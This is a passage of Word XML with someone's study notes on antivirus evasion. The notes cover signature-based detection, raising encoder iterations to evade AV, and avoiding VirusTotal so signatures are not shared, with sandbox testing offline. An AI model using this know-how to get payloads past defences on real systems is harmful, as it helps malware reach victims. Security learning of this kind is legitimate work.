          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7540"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00650CB7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Signature-based detection</w:t>
      </w:r>
      <w:r w:rsidRPr="00650CB7">
        <w:t xml:space="preserve"> → antivirus/IDS uses known “signatures” (patterns) of malicious code or behavior; a signature might be a hash, but it can also be a byte sequence, opcode pattern, or regex-like rule.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F79961F" w14:textId="77777777" w:rsidR="00650CB7" w:rsidRPr="00650CB7" w:rsidRDefault="00650CB7" w:rsidP="00650CB7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7540"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00650CB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>👉</w:t>
      </w:r>
      <w:r w:rsidRPr="00650CB7">
        <w:t xml:space="preserve"> So, </w:t>
      </w:r>
      <w:r w:rsidRPr="00650CB7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hashing is one form of signature</w:t>
      </w:r>
      <w:r w:rsidRPr="00650CB7">
        <w:t xml:space="preserve">, but signature-based detection is broader than just </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00650CB7">
        <w:t>file</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00650CB7">
        <w:t xml:space="preserve"> hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143F6413" w14:textId="77777777" w:rsidR="00650CB7" w:rsidRDefault="00650CB7" w:rsidP="00385F33">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7540"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="358B2A37" w14:textId="77777777" w:rsidR="00385F33" w:rsidRDefault="00385F33" w:rsidP="00385F33">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7540"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Each file has unique Hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BA36B1" w14:textId="77777777" w:rsidR="00650CB7" w:rsidRDefault="00650CB7" w:rsidP="00385F33">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7540"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E1E3303" w14:textId="0235311B" w:rsidR="00BE589E" w:rsidRDefault="00385F33" w:rsidP="00385F33">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7540"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00CB0647">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In the case of signature</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, the AV </w:t>
      </w:r>
      <w:r w:rsidR="00650CB7">
        <w:t>company</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00650CB7">
        <w:t>generates</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the signature for malicious files, </w:t>
      </w:r>
      <w:r w:rsidR="00650CB7">
        <w:t>payload,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> executable and </w:t>
      </w:r>
      <w:r w:rsidR="00650CB7">
        <w:t>stores</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> them in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0647">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>signature database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of each company.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F00E203" w14:textId="77777777" w:rsidR="00BE589E" w:rsidRDefault="00BE589E"/>
    <w:p w14:paraId="7D80124B" w14:textId="7C500FF0" w:rsidR="00650CB7" w:rsidRDefault="00A0641C">
      <w:r>
        <w:t xml:space="preserve">When the payload is on the victim pc and execute it the AV solution </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0647">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>check the signature</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of it in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0647">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>signature database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of the AV company, if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>their</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is match </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>their</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> comes the flag as malicious then Corentin or removed from the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE4B6E9" w14:textId="77777777" w:rsidR="00A0641C" w:rsidRDefault="00A0641C"/>
    <w:p w14:paraId="0988DA61" w14:textId="0A6C9B7B" w:rsidR="00A0641C" w:rsidRDefault="00A0641C">
      <w:r>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB0647">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>particular attack</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB0647">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> vector is not used anymore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> because the AV solutions have a huge signature database and modify /changing the signature help you little. (very little chance that it will work on modern)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CD0C3B" w14:textId="10FB7379" w:rsidR="00A0641C" w:rsidRDefault="00A0641C">
      <w:r>
        <w:t xml:space="preserve">But </w:t>
      </w:r>
      <w:r w:rsidRPr="000F51FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>it works on the older AV solution</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as window defender(old), window 7 etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DC4F25" w14:textId="77777777" w:rsidR="00A0641C" w:rsidRDefault="00A0641C"/>
    <w:p w14:paraId="7C62D544" w14:textId="7CDB99E7" w:rsidR="00A0641C" w:rsidRDefault="004105EF">
      <w:r>
        <w:t>X86 payload works on both x86, x64 OS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C1B899" w14:textId="77777777" w:rsidR="004105EF" w:rsidRDefault="004105EF"/>
    <w:p w14:paraId="5E72D5D2" w14:textId="77777777" w:rsidR="00AB42AF" w:rsidRPr="008662C1" w:rsidRDefault="00AB42AF" w:rsidP="00AB42AF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008662C1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Iteration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7681C03D" w14:textId="77777777" w:rsidR="00AB42AF" w:rsidRDefault="00AB42AF" w:rsidP="00AB42AF">
      <w:r>
        <w:t xml:space="preserve">Increasing the value of </w:t>
      </w:r>
      <w:r w:rsidRPr="008662C1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Iteration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, the more the chances of </w:t>
      </w:r>
      <w:r w:rsidRPr="008662C1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>evading the AV</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A87B37" w14:textId="47AD7415" w:rsidR="000A1BAA" w:rsidRDefault="000A1BAA"/>
    <w:p w14:paraId="3043AACA" w14:textId="4235345B" w:rsidR="000A1BAA" w:rsidRDefault="000A1BAA">
      <w:r>
        <w:t xml:space="preserve">Testing / uploading the payload to </w:t>
      </w:r>
      <w:r w:rsidRPr="000F51FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>the virus total website</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> because signature will store </w:t>
      </w:r>
      <w:r w:rsidR="000F51FD">
        <w:t>on it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and then </w:t>
      </w:r>
      <w:r w:rsidRPr="000F51FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>submitted to anti-virus companies</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511F8494" w14:textId="03DDEE5A" w:rsidR="000A1BAA" w:rsidRDefault="000A1BAA">
      <w:r>
        <w:t xml:space="preserve">To test it setup </w:t>
      </w:r>
      <w:r w:rsidRPr="000F51FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>the sandbox environment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with AV and disconnect from the internet, now test it that it is detected by the AV (this process takes a lot of time </w:t>
      </w:r>
      <w:r w:rsidRPr="000F51FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>with trail and errors</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157A68FA" w14:textId="77777777" w:rsidR="000A1BAA" w:rsidRDefault="000A1BAA"/>
    <w:p w14:paraId="7BC49EA8" w14:textId="39C910AD" w:rsidR="00B16F42" w:rsidRDefault="00B16F42">
      <w:r w:rsidRPr="00DB3990">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">python -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DB3990">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B16F42">
        <w:t xml:space="preserve"> serves files from your machine; it's reachable by </w:t>
      </w:r>
      <w:r w:rsidRPr="00B16F42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>any host that can connect</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16F42">
        <w:t xml:space="preserve"> to your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B16F42">
        <w:t>IP:port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B16F42">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16F42">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B16F42">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Usually </w:t>
      </w:r>
      <w:r w:rsidRPr="00B16F42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>only local network</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16F42">
        <w:t xml:space="preserve"> can reach it (NAT/firewall block internet) unless you open/forward the port or expose your public IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5B81AE" w14:textId="77777777" w:rsidR="000A1BAA" w:rsidRDefault="000A1BAA"/>
    <w:sectPr w:rsidR="000A1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92ED1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9BE0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89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54"/>
    <w:rsid w:val="000A1BAA"/>
    <w:rsid w:val="000F51FD"/>
    <w:rsid w:val="00385F33"/>
    <w:rsid w:val="004105EF"/>
    <w:rsid w:val="00471F1D"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00650CB7"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="008662C1"/>
    <w:rsid w:val="00A0641C"/>
    <w:rsid w:val="00AB42AF"/>
    <w:rsid w:val="00AC03AB"/>
    <w:rsid w:val="00B00688"/>
    <w:rsid w:val="00B16F42"/>
    <w:rsid w:val="00B4269A"/>
    <w:rsid w:val="00BE589E"/>
    <w:rsid w:val="00CB0647"/>
    <w:rsid w:val="00D24D54"/>
    <w:rsid w:val="00DB3990"/>
    <w:rsid w:val="00F918E0"/>
    <w:rsid w:val="00FC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0023"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B136F0CD-5D36-43C9-8D29-E976F0D6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D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8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rget_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28</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-04T07:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-04T08:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>